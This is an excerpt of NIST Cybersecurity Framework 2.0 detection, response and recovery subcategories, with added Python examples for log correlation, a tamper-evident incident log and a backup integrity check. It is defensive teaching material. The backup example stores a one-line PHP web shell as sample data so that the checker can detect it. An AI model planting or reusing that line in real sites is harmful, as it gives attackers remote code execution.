SP 800-53 Rev 5.1.1: AC-04, AC-09, AU-12, CA-07, CM-03, CM-06, CM-10, CM-11, SC-34, SC-35, SI-04, SI-07

Category DE.AE
Informative References:
CRI Profile v2.0: DE.AE
CSF v1.1: DE.AE, DE.DP-2

Subcategory DE.AE-02
Implementation Examples:
Ex1: Use security information and event management (SIEM) or other tools to continuously monitor log events for known malicious and suspicious activity
Ex2: Utilize up-to-date cyber threat intelligence in log analysis tools to improve detection accuracy and characterize threat actors, their methods, and indicators of compromise
Ex3: Regularly conduct manual reviews of log events for technologies that cannot be sufficiently monitored through automation
Ex4: Use log analysis tools to generate reports on their findings
Informative References:
CIS Controls v8.0: 8.11
CRI Profile v2.0: DE.AE-02, DE.AE-02.01, DE.AE-02.02
CSF v1.1: DE.AE-2
SP 800-53 Rev 5.1.1: AU-06, CA-07, IR-04, SI-04

Subcategory DE.AE-03
Implementation Examples:
Ex1: Constantly transfer log data generated by other sources to a relatively small number of log servers
Ex2: Use event correlation technology (e.g., SIEM) to collect information captured by multiple sources
Ex3: Utilize cyber threat intelligence to help correlate events among log sources
Informative References:
CRI Profile v2.0: DE.AE-03, DE.AE-03.01, DE.AE-03.02
CSF v1.1: DE.AE-3
SP 800-53 Rev 5.1.1: AU-06, CA-07, PM-16, IR-04, IR-05, IR-08, SI-04
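The outcomes above are stated as outcomes, not mechanisms: DE.CM-09 Ex2 asks that authentication attempts be monitored for attacks against credentials, and DE.AE-03 Ex2 and Ex3 that events collected centrally from multiple sources be correlated. The Python below is an added example, not part of the CSF or of the Reference Tool, showing the kind of correlation rule a SOC would run over a central log store. It normalizes two constructed log formats (a VPN concentrator and an identity provider, both invented for the example, as are the hostnames, usernames and the RFC 5737 test addresses), then flags password spraying from one address and a burst of failures followed by a success for the same account, with the failures and the success coming from different sources. The thresholds and the time window are assumptions to be tuned per environment.

```python
"""Correlate authentication events from several log sources to find credential
attacks. Added example; log formats, hosts, users and addresses are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from typing import NamedTuple


class AuthEvent(NamedTuple):
    ts: datetime
    source: str      # system that produced the event
    user: str
    ip: str
    success: bool


# Constructed formats standing in for a VPN concentrator (syslog) and an IdP.
VPN_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) auth: user=(?P<user>\S+) "
                    r"src=(?P<ip>\S+) result=(?P<res>OK|FAIL)$")
IDP_RE = re.compile(r"^(?P<ts>\S+) idp login user=(?P<user>\S+) ip=(?P<ip>\S+) "
                    r"outcome=(?P<res>success|failure)$")


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def parse_line(line):
    """Normalize one line from either source into an AuthEvent; None if unparseable."""
    m = VPN_RE.match(line)
    if m:
        return AuthEvent(_ts(m["ts"]), m["host"], m["user"].lower(), m["ip"], m["res"] == "OK")
    m = IDP_RE.match(line)
    if m:
        return AuthEvent(_ts(m["ts"]), "idp", m["user"].lower(), m["ip"], m["res"] == "success")
    return None


def detect(lines, spray_users=5, brute_fails=5, window=timedelta(minutes=10)):
    """Two correlation rules over centrally collected lines (thresholds are assumptions).

    password_spray: one IP fails against >= spray_users distinct accounts within
    `window`; per-account lockouts never fire because each account sees few failures.
    credential_compromise: >= brute_fails failures for one (account, IP) pair within
    `window` and then a success for that pair, correlated across all sources.
    """
    events = sorted(filter(None, map(parse_line, lines)), key=lambda e: e.ts)
    findings = []

    fails_by_ip = defaultdict(list)
    for e in events:
        if not e.success:
            fails_by_ip[e.ip].append(e)
    for ip, evs in fails_by_ip.items():
        start = 0
        for end in range(len(evs)):          # sliding window over time-ordered failures
            while evs[end].ts - evs[start].ts > window:
                start += 1
            users = {x.user for x in evs[start:end + 1]}
            if len(users) >= spray_users:
                findings.append(("password_spray", ip, sorted(users)))
                break

    fails_by_pair = defaultdict(list)
    for e in events:
        key = (e.user, e.ip)
        if e.success:
            recent = [f for f in fails_by_pair[key] if e.ts - f.ts <= window]
            if len(recent) >= brute_fails:
                sources = sorted({f.source for f in recent} | {e.source})
                findings.append(("credential_compromise", e.user, e.ip, sources))
                fails_by_pair[key].clear()   # one alert per burst
        else:
            fails_by_pair[key].append(e)
    return findings


# Constructed sample from the central log store: a spray from 198.51.100.9, a brute
# force against "frank" on the VPN that then succeeds at the IdP, a benign typo by
# "grace", and one non-authentication line the parser must ignore.
SAMPLE_LOGS = [
    f"2024-05-02T09:00:0{i}Z vpn01 auth: user={u} src=198.51.100.9 result=FAIL"
    for i, u in enumerate(["alice", "bob", "carol", "dave", "erin"], 1)
] + [
    f"2024-05-02T09:10:{s:02d}Z vpn01 auth: user=Frank src=203.0.113.7 result=FAIL"
    for s in range(0, 50, 10)
] + [
    "2024-05-02T09:12:00Z idp login user=frank ip=203.0.113.7 outcome=success",
    "2024-05-02T09:30:00Z idp login user=grace ip=192.0.2.44 outcome=failure",
    "2024-05-02T09:30:30Z idp login user=grace ip=192.0.2.44 outcome=success",
    "2024-05-02T09:31:00Z vpn01 health: tunnel count=12",
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOGS):
        print(finding)
```

The second rule is the one that needs the central store: the failures are visible only to the VPN and the success only to the IdP, so neither system can raise the alert on its own. Usernames are lower-cased before keying because the two sources record case differently, a small normalization step that otherwise silently breaks the correlation.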

Subcategory DE.AE-04
Implementation Examples:
Ex1: Use SIEMs or other tools to estimate impact and scope, and review and refine the estimates
Ex2: A person creates their own estimates of impact and scope
Informative References:
CRI Profile v2.0: DE.AE-04, DE.AE-04.01
CSF v1.1: DE.AE-4
SP 800-53 Rev 5.1.1: PM-09, PM-11, PM-18, PM-28, PM-30

Subcategory DE.AE-06
Implementation Examples:
Ex1: Use cybersecurity software to generate alerts and provide them to the security operations center (SOC), incident responders, and incident response tools
Ex2: Incident responders and other authorized personnel can access log analysis findings at all times
Ex3: Automatically create and assign tickets in the organization's ticketing system when certain types of alerts occur
Ex4: Manually create and assign tickets in the organization's ticketing system when technical staff discover indicators of compromise
Informative References:
CRI Profile v2.0: DE.AE-06, DE.AE-06.01
CSF v1.1: DE.DP-4
SP 800-53 Rev 5.1.1: IR-04, PM-15, PM-16, RA-04, RA-10

Subcategory DE.AE-07
Implementation Examples:
Ex1: Securely provide cyber threat intelligence feeds to detection technologies, processes, and personnel
Ex2: Securely provide information from asset inventories to detection technologies, processes, and personnel
Ex3: Rapidly acquire and analyze vulnerability disclosures for the organization's technologies from suppliers, vendors, and third-party security advisories
Informative References:
CRI Profile v2.0: DE.AE-07, DE.AE-07.01, DE.AE-07.02
CSF v1.1: DE.AE-3
SP 800-53 Rev 5.1.1: PM-16, RA-03, RA-10

Subcategory DE.AE-08
Implementation Examples:
Ex1: Apply incident criteria to known and assumed characteristics of activity in order to determine whether an incident should be declared
Ex2: Take known false positives into account when applying incident criteria
Informative References:
CRI Profile v2.0: DE.AE-08, DE.AE-08.01
CSF v1.1: DE.AE-5
SP 800-53 Rev 5.1.1: IR-04, IR-08

Function RS
Informative References:
CRI Profile v2.0: RS
CSF v1.1: RS

Category RS.MA
Informative References:
CRI Profile v2.0: RS.MA
CSF v1.1: RS.RP
SP 800-53 Rev 5.1.1: IR-04, IR-07, IR-08, IR-09

Subcategory RS.MA-01
Implementation Examples:
Ex1: Detection technologies automatically report confirmed incidents
Ex2: Request incident response assistance from the organization's incident response outsourcer
Ex3: Designate an incident lead for each incident
Ex4: Initiate execution of additional cybersecurity plans as needed to support incident response (for example, business continuity and disaster recovery)
Informative References:
CIS Controls v8.0: 17.4
CRI Profile v2.0: RS.MA-01, RS.MA-01.01
CSF v1.1: RS.RP-1, RS.CO-4
SP 800-53 Rev 5.1.1: IR-06, IR-07, IR-08, SR-03, SR-08

Subcategory RS.MA-02
Implementation Examples:
Ex1: Preliminarily review incident reports to confirm that they are cybersecurity-related and necessitate incident response activities
Ex2: Apply criteria to estimate the severity of an incident
Informative References:
CRI Profile v2.0: RS.MA-02, RS.MA-02.01
CSF v1.1: RS.AN-1, RS.AN-2
SP 800-53 Rev 5.1.1: IR-04, IR-05, IR-06

Subcategory RS.MA-03
Implementation Examples:
Ex1: Further review and categorize incidents based on the type of incident (e.g., data breach, ransomware, DDoS, account compromise)
Ex2: Prioritize incidents based on their scope, likely impact, and time-critical nature
Ex3: Select incident response strategies for active incidents by balancing the need to quickly recover from an incident with the need to observe the attacker or conduct a more thorough investigation
Informative References:
CRI Profile v2.0: RS.MA-03, RS.MA-03.01
CSF v1.1: RS.AN-4, RS.AN-2
SP 800-53 Rev 5.1.1: IR-04, IR-05, IR-06

Subcategory RS.MA-04
Implementation Examples:
Ex1: Track and validate the status of all ongoing incidents
Ex2: Coordinate incident escalation or elevation with designated internal and external stakeholders
Informative References:
CRI Profile v2.0: RS.MA-04, RS.MA-04.01
CSF v1.1: RS.AN-2, RS.CO-4
SP 800-53 Rev 5.1.1: IR-04, IR-05, IR-06, IR-07

Subcategory RS.MA-05
Implementation Examples:
Ex1: Apply incident recovery criteria to known and assumed characteristics of the incident to determine whether incident recovery processes should be initiated
Ex2: Take the possible operational disruption of incident recovery activities into account
Informative References:
CIS Controls v8.0: 17.9
CRI Profile v2.0: RS.MA-05, RS.MA-05.01
SP 800-53 Rev 5.1.1: IR-04, IR-08

Category RS.AN
Informative References:
CRI Profile v2.0: RS.AN
CSF v1.1: RS.AN

Subcategory RS.AN-03
Implementation Examples:
Ex1: Determine the sequence of events that occurred during the incident and which assets and resources were involved in each event
Ex2: Attempt to determine what vulnerabilities, threats, and threat actors were directly or indirectly involved in the incident
Ex3: Analyze the incident to find the underlying, systemic root causes
Ex4: Check any cyber deception technology for additional information on attacker behavior
Informative References:
CIS Controls v8.0: 17.8
CRI Profile v2.0: RS.AN-03, RS.AN-03.01
CSF v1.1: RS.AN-3
SP 800-53 Rev 5.1.1: AU-07, IR-04

Subcategory RS.AN-06
Implementation Examples:
Ex1: Require each incident responder and others (e.g., system administrators, cybersecurity engineers) who perform incident response tasks to record their actions and make the record immutable
Ex2: Require the incident lead to document the incident in detail and be responsible for preserving the integrity of the documentation and the sources of all information being reported
Informative References:
CRI Profile v2.0: RS.AN-06, RS.AN-06.01
CSF v1.1: RS.AN-3
SP 800-53 Rev 5.1.1: AU-07, IR-04, IR-06

Subcategory RS.AN-07
Implementation Examples:
Ex1: Collect, preserve, and safeguard the integrity of all pertinent incident data and metadata (e.g., data source, date/time of collection) based on evidence preservation and chain-of-custody procedures
Informative References:
CRI Profile v2.0: RS.AN-07, RS.AN-07.01
SP 800-53 Rev 5.1.1: AU-07, IR-04, IR-06
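RS.AN-06 Ex1 asks for responder action records that are immutable, and RS.AN-07 Ex1 for evidence whose integrity and chain of custody are preserved. The Python below is an added example, not from the CSF or the Reference Tool, showing one way to make both verifiable: a hash-chained action log in which each entry commits to the hash of its predecessor, so that editing or deleting an earlier record breaks verification, and an evidence manifest that records the SHA-256 of each artifact at acquisition together with a custody trail. The analyst names, host name, timestamps and the "memory image" bytes are constructed. A hash chain makes tampering detectable, not impossible; the record is immutable in practice only when the chain head returned by each append is also kept somewhere the responders cannot rewrite (append-only storage, a signed timestamp, or a copy held by another team).

```python
"""Tamper-evident responder action log and evidence manifest with chain of custody.
Added example; names, timestamps and artifact bytes are constructed."""
import hashlib
import json
from datetime import datetime, timezone


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def canonical(record: dict) -> bytes:
    """Canonical JSON so the hash does not depend on key order or whitespace."""
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode()


class ActionLog:
    """Append-only record of responder actions. Each entry commits to the hash of
    the previous entry, so editing, deleting or reordering earlier entries is detected."""
    GENESIS = "0" * 64

    def __init__(self):
        self.entries = []

    def record(self, actor, action, ts=None):
        prev = self.entries[-1]["hash"] if self.entries else self.GENESIS
        body = {"seq": len(self.entries),
                "ts": ts or datetime.now(timezone.utc).isoformat(),
                "actor": actor, "action": action, "prev": prev}
        entry = dict(body, hash=sha256_hex(canonical(body)))
        self.entries.append(entry)
        return entry["hash"]      # chain head: store it out of the responders' reach

    def verify(self):
        """Return (True, None) if the chain is intact, else (False, index of first bad entry)."""
        prev = self.GENESIS
        for i, e in enumerate(self.entries):
            body = {k: v for k, v in e.items() if k != "hash"}
            if e["prev"] != prev or e["seq"] != i or sha256_hex(canonical(body)) != e["hash"]:
                return False, i
            prev = e["hash"]
        return True, None


class EvidenceManifest:
    """Evidence items with acquisition hash, size, source and a custody trail."""

    def __init__(self):
        self.items = {}

    def acquire(self, item_id, data: bytes, source, collector, collected_at):
        digest = sha256_hex(data)
        self.items[item_id] = {"sha256": digest, "size": len(data), "source": source,
                               "custody": [{"ts": collected_at, "who": collector, "event": "acquired"}]}
        return digest

    def transfer(self, item_id, from_who, to_who, ts):
        self.items[item_id]["custody"].append(
            {"ts": ts, "from": from_who, "who": to_who, "event": "transferred"})

    def verify(self, item_id, data: bytes) -> bool:
        """Re-hash the artifact as currently held and compare with the acquisition hash."""
        return sha256_hex(data) == self.items[item_id]["sha256"]


def demo() -> dict:
    """Constructed walk-through: record actions, tamper with one, then check evidence."""
    log = ActionLog()
    log.record("analyst1", "isolated host ws-042 from the network", "2024-05-02T10:00:00Z")
    log.record("analyst1", "acquired memory image of ws-042", "2024-05-02T10:05:00Z")
    log.record("sysadmin2", "reset credentials for account frank", "2024-05-02T10:07:00Z")
    ok_before, _ = log.verify()
    log.entries[1]["action"] = "took no action"     # simulated after-the-fact edit
    ok_after, first_bad = log.verify()

    image = b"constructed stand-in for the acquired memory image"
    manifest = EvidenceManifest()
    manifest.acquire("ws-042-mem", image, "ws-042 RAM", "analyst1", "2024-05-02T10:05:00Z")
    manifest.transfer("ws-042-mem", "analyst1", "forensics-lab", "2024-05-02T12:00:00Z")
    return {"chain_ok_before": ok_before, "chain_ok_after": ok_after, "first_bad": first_bad,
            "evidence_intact": manifest.verify("ws-042-mem", image),
            "corruption_detected": not manifest.verify("ws-042-mem", image + b"\x00"),
            "custody_events": len(manifest.items["ws-042-mem"]["custody"])}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Hashing the canonical JSON rather than the dict's repr matters: two serializations of the same record must produce the same digest, or verification fails on honest data and the log becomes useless as evidence.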

Subcategory RS.AN-08
Implementation Examples:
Ex1: Review other potential targets of the incident to search for indicators of compromise and evidence of persistence
Ex2: Automatically run tools on targets to look for indicators of compromise and evidence of persistence
Informative References:
CRI Profile v2.0: RS.AN-08, RS.AN-08.01
SP 800-53 Rev 5.1.1: IR-04, IR-08, RA-03, RA-07

Category RS.CO
Informative References:
CRI Profile v2.0: RS.CO
CSF v1.1: RS.CO

Subcategory RS.CO-02
Implementation Examples:
Ex1: Follow the organization's breach notification procedures after discovering a data breach incident, including notifying affected customers
Ex2: Notify business partners and customers of incidents in accordance with contractual requirements
Ex3: Notify law enforcement agencies and regulatory bodies of incidents based on criteria in the incident response plan and management approval
Informative References:
CIS Controls v8.0: 17.2
CRI Profile v2.0: RS.CO-02, RS.CO-02.01, RS.CO-02.02, RS.CO-02.03
CSF v1.1: RS.CO-2, RS.CO-3
SP 800-53 Rev 5.1.1: IR-04, IR-06, IR-07, SR-03, SR-08

Subcategory RS.CO-03
Implementation Examples:
Ex1: Securely share information consistent with response plans and information sharing agreements
Ex2: Voluntarily share information about an attacker's observed TTPs, with all sensitive data removed, with an Information Sharing and Analysis Center (ISAC)
Ex3: Notify HR when malicious insider activity occurs
Ex4: Regularly update senior leadership on the status of major incidents
Ex5: Follow the rules and protocols defined in contracts for incident information sharing between the organization and its suppliers
Ex6: Coordinate crisis communication methods between the organization and its critical suppliers
Informative References:
CIS Controls v8.0: 17.2
CRI Profile v2.0: RS.CO-03, RS.CO-03.01, RS.CO-03.02
CSF v1.1: RS.CO-3, RS.CO-5
SP 800-53 Rev 5.1.1: IR-04, IR-06, IR-07, SR-03, SR-08

Category RS.MI
Informative References:
CRI Profile v2.0: RS.MI
CSF v1.1: RS.MI

Subcategory RS.MI-01
Implementation Examples:
Ex1: Cybersecurity technologies (e.g., antivirus software) and cybersecurity features of other technologies (e.g., operating systems, network infrastructure devices) automatically perform containment actions
Ex2: Allow incident responders to manually select and perform containment actions
Ex3: Allow a third party (e.g., internet service provider, managed security service provider) to perform containment actions on behalf of the organization
Ex4: Automatically transfer compromised endpoints to a remediation virtual local area network (VLAN)
Informative References:
CRI Profile v2.0: RS.MI-01, RS.MI-01.01
CSF v1.1: RS.MI-1
SP 800-53 Rev 5.1.1: IR-04

Subcategory RS.MI-02
Implementation Examples:
Ex1: Cybersecurity technologies and cybersecurity features of other technologies (e.g., operating systems, network infrastructure devices) automatically perform eradication actions
Ex2: Allow incident responders to manually select and perform eradication actions
Ex3: Allow a third party (e.g., managed security service provider) to perform eradication actions on behalf of the organization
Informative References:
CRI Profile v2.0: RS.MI-02, RS.MI-02.01
CSF v1.1: RS.MI-2
SP 800-53 Rev 5.1.1: IR-04

Function RC
Informative References:
CRI Profile v2.0: RC
CSF v1.1: RC

Category RC.RP
Informative References:
CRI Profile v2.0: RC.RP
CSF v1.1: RC.RP
SP 800-53 Rev 5.1.1: CP-04, CP-10

Subcategory RC.RP-01
Implementation Examples:
Ex1: Begin recovery procedures during or after incident response processes
Ex2: Make all individuals with recovery responsibilities aware of the plans for recovery and the authorizations required to implement each aspect of the plans
Informative References:
CRI Profile v2.0: RC.RP-01, RC.RP-01.01
CSF v1.1: RC.RP-1
SP 800-53 Rev 5.1.1: CP-10, IR-04, IR-08

Subcategory RC.RP-02
Implementation Examples:
Ex1: Select recovery actions based on the criteria defined in the incident response plan and available resources
Ex2: Change planned recovery actions based on a reassessment of organizational needs and resources
Informative References:
CRI Profile v2.0: RC.RP-02, RC.RP-02.01, RC.RP-02.02
CSF v1.1: RC.RP-1
SP 800-53 Rev 5.1.1: CP-10, IR-04, IR-08

Subcategory RC.RP-03
Implementation Examples:
Ex1: Check restoration assets for indicators of compromise, file corruption, and other integrity issues before use
Informative References:
CIS Controls v8.0: 11.5
CRI Profile v2.0: RC.RP-03, RC.RP-03.01
SP 800-53 Rev 5.1.1: CP-02, CP-04, CP-09
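RC.RP-03 Ex1 (and RC.RP-05 Ex1 below) require restoration assets to be checked for compromise and corruption before they are used. The Python below is an added example, not from the CSF or the Reference Tool. It compares a backup set against the manifest captured when the backup was taken, distinguishing corrupted, missing and unexpected files, and also checks every file's hash against an indicator-of-compromise list, because a backup taken after the intrusion matches its own manifest perfectly and still carries the attacker's web shell. The paths, file contents and the IOC hash are constructed; a real check would stream files from the backup media, keep the manifest apart from the backup it describes, and take IOCs from the incident analysis or threat intelligence.

```python
"""Check a restoration set for corruption and indicators of compromise before use.
Added example; paths, contents and the IOC hash are constructed."""
import hashlib


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(files: dict) -> dict:
    """path -> SHA-256, recorded when the backup is taken and stored apart from it."""
    return {path: sha256_hex(content) for path, content in files.items()}


def check_restoration_set(files: dict, manifest: dict, ioc_hashes: set) -> dict:
    """Return path -> problem for every file that must not be restored as-is.

    An empty result means every manifest entry is present and unmodified and no file
    matches a known-bad hash. Manifest agreement alone is not enough: a backup taken
    after the intrusion reproduces the attacker's files exactly, so the IOC check is
    what catches them.
    """
    problems = {}
    for path, expected in manifest.items():
        if path not in files:
            problems[path] = "missing"
        elif sha256_hex(files[path]) != expected:
            problems[path] = "corrupted_or_modified"
    for path, content in files.items():
        if path not in manifest:
            problems[path] = "unexpected_file"
        elif sha256_hex(content) in ioc_hashes:
            problems[path] = "known_malicious_content"
    return problems


def safe_to_restore(files: dict, manifest: dict, ioc_hashes: set) -> bool:
    return not check_restoration_set(files, manifest, ioc_hashes)


# Constructed backup contents at backup time; the web shell was already present.
BACKUP_CONTENTS = {
    "etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n",
    "etc/hosts": b"127.0.0.1 localhost\n",
    "var/www/index.php": b"<?php echo 'welcome'; ?>\n",
    "var/www/.cache.php": b"<?php eval(base64_decode($_POST['c'])); ?>\n",
}
MANIFEST = build_manifest(BACKUP_CONTENTS)

# Constructed IOC: the web shell's hash, as incident analysis or CTI would supply it.
IOC_HASHES = {sha256_hex(BACKUP_CONTENTS["var/www/.cache.php"])}

# What actually came off the restoration media: one file truncated, one missing,
# one not in the manifest, and the web shell intact.
RESTORE_SET = {
    "etc/passwd": BACKUP_CONTENTS["etc/passwd"],
    "var/www/index.php": b"<?php echo 'welcome'; ?\n",
    "var/www/.cache.php": BACKUP_CONTENTS["var/www/.cache.php"],
    "tmp/x": b"not in the manifest",
}

if __name__ == "__main__":
    for path, problem in sorted(check_restoration_set(RESTORE_SET, MANIFEST, IOC_HASHES).items()):
        print(f"{problem:26} {path}")
    print("safe to restore:", safe_to_restore(RESTORE_SET, MANIFEST, IOC_HASHES))
```

The restoration decision is the boolean from safe_to_restore; the per-file problems feed the RC.RP-05 check of whether the incident's root cause was actually remediated in what is being brought back.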

Subcategory RC.RP-04
Implementation Examples:
Ex1: Use business impact and system categorization records (including service delivery objectives) to validate that essential services are restored in the appropriate order
Ex2: Work with system owners to confirm the successful restoration of systems and the return to normal operations
Ex3: Monitor the performance of restored systems to verify the adequacy of the restoration
Informative References:
CRI Profile v2.0: RC.RP-04, RC.RP-04.01
SP 800-53 Rev 5.1.1: PM-08, PM-09, PM-11, IR-01, IR-08

Subcategory RC.RP-05
Implementation Examples:
Ex1: Check restored assets for indicators of compromise and remediation of root causes of the incident before production use
Ex2: Verify the correctness and adequacy of the restoration actions taken before putting a restored system online
Informative References:
CRI Profile v2.0: RC.RP-05, RC.RP-05.01, RC.RP-05.02
SP 800-53 Rev 5.1.1: CP-10

Subcategory RC.RP-06
Implementation Examples:
Ex1: Prepare an after-action report that documents the incident itself, the response and recovery actions taken, and lessons learned
Ex2: Declare the end of incident recovery once the criteria are met
Informative References:
CRI Profile v2.0: RC.RP-06, RC.RP-06.01
SP 800-53 Rev 5.1.1: IR-04, IR-08

Category RC.CO
Informative References:
CRI Profile v2.0: RC.CO
CSF v1.1: RC.CO

Subcategory RC.CO-03
Implementation Examples:
Ex1: Securely share recovery information, including restoration progress, consistent with response plans and information sharing agreements
Ex2: Regularly update senior leadership on recovery status and restoration progress for major incidents
Ex3: Follow the rules and protocols defined in contracts for incident information sharing between the organization and its suppliers
Ex4: Coordinate crisis communication between the organization and its critical suppliers
Informative References:
CRI Profile v2.0: RC.CO-03, RC.CO-03.01, RC.CO-03.02
CSF v1.1: RC.CO-3
SP 800-221A: GV.CO-1
SP 800-53 Rev 5.1.1: IR-04, IR-06, SR-08

Subcategory RC.CO-04
Implementation Examples:
Ex1: Follow the organization's breach notification procedures for recovering from a data breach incident
Ex2: Explain the steps being taken to recover from the incident and to prevent a recurrence
Informative References:
CIS Controls v8.0: 17.2, 17.6
CRI Profile v2.0: RC.CO-04, RC.CO-04.01
CSF v1.1: RC.CO-1, RS.CO-2
SP 800-221A: GV.CO-1
SP 800-53 Rev 5.1.1: CP-02, IR-04
